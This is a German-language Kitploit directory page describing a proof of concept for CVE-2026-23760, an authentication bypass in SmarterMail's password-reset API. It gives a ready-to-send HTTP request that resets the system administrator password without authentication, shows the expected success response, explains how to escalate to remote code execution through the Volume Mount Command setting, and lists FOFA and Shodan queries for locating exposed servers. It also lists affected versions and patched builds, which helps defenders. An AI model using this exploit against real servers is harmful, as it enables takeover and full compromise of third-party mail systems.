Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
smartermail-CVE-2026-23760-poc — CVE-2026-23760 – Eine Authentifizierungsumgehung über die Passwort-Reset-API in SmarterMail. | Kitploit
Tools/GitHubGitHub/maxmnml/smartermail-cve-2026-23760-poc
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmaxmnml/smartermail-cve-2026-23760-poc

smartermail-CVE-2026-23760-poc

CVE-2026-23760 – Eine Authentifizierungsumgehung über die Passwort-Reset-API in SmarterMail.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
62vor 7 MonatenNoch nicht geprüft

SmarterMail-CVE-2026-23760-poc

Ein Proof-of-Concept, das eine Authentifizierungsumgehung über die Passwort-Reset-API für das Systemadministrator-Konto von SmarterMail ausnutzt.

Schwachstelle

Die Schwachstelle besteht aufgrund einer Authentifizierungsumgehung in der Passwort-Reset-API. Der Endpunkt force-reset-password erlaubt anonyme Anfragen und versäumt es, das bestehende Passwort oder ein Reset-Token bei der Zurücksetzung von Systemadministrator-Konten zu verifizieren.

  • Übernahme des Systemadministrator-Kontos.
  • Ein direkter Weg zur Remote-Codeausführung über die integrierte SmarterMail-Funktionalität.

Betroffene Versionen

  • SmarterTools SmarterMail-Versionen vor Build 9511

PoC (von watchtowr labs)

Der PoC ist so einfach wie folgt:

root@kitploit:~
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

Sie sollten die folgende Antwort erhalten, die bestätigt, dass das Passwort erfolgreich geändert wurde:

root@kitploit:~
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

Die einzige verbleibende Anforderung ist die Kenntnis des Benutzernamens des Administratorkontos.

Vom ATO zur RCE und darüber hinaus

Sobald ein Angreifer als Systemadministrator authentifiziert ist, kann er:

  • Zu Einstellungen -> Volume-Mounts navigieren.
  • Ein neues Volume erstellen.
  • Einen beliebigen Befehl im Feld Volume Mount Command angeben.

Dieser Befehl wird vom zugrunde liegenden Betriebssystem ausgeführt. An diesem Punkt hat der Angreifer eine vollständige Remote-Codeausführung auf dem Host erreicht.

Wenn die Konfiguration gespeichert wird, wird der angegebene Befehl sofort ausgeführt.

Automatisierung

Nuclei-Template:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml

In freier Wildbahn

FOFA:

root@kitploit:~
title='SmarterMail'

SHODAN:

root@kitploit:~
html:'SmarterMail'

Auswirkungen

Ein nicht authentifizierter Remote-Angreifer kann die Authentifizierung für das Systemadministrator-Konto umgehen und Zugriff erlangen. Nach der Authentifizierung kann er eine vollständige Remote-Codeausführung auf dem Host durchführen.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Kritisch

Behebung & Schadensbegrenzung

Auf die neueste Version aktualisieren: https://www.smartertools.com/smartermail/downloads

  • Build 9511 (15. Januar 2026)
  • Build 9518 (22. Januar 2026)

Referenzen

  • SmarterMail-Versionshinweise
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760
  • watchTowr-Blog und PoC

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal.

Tool herunterladen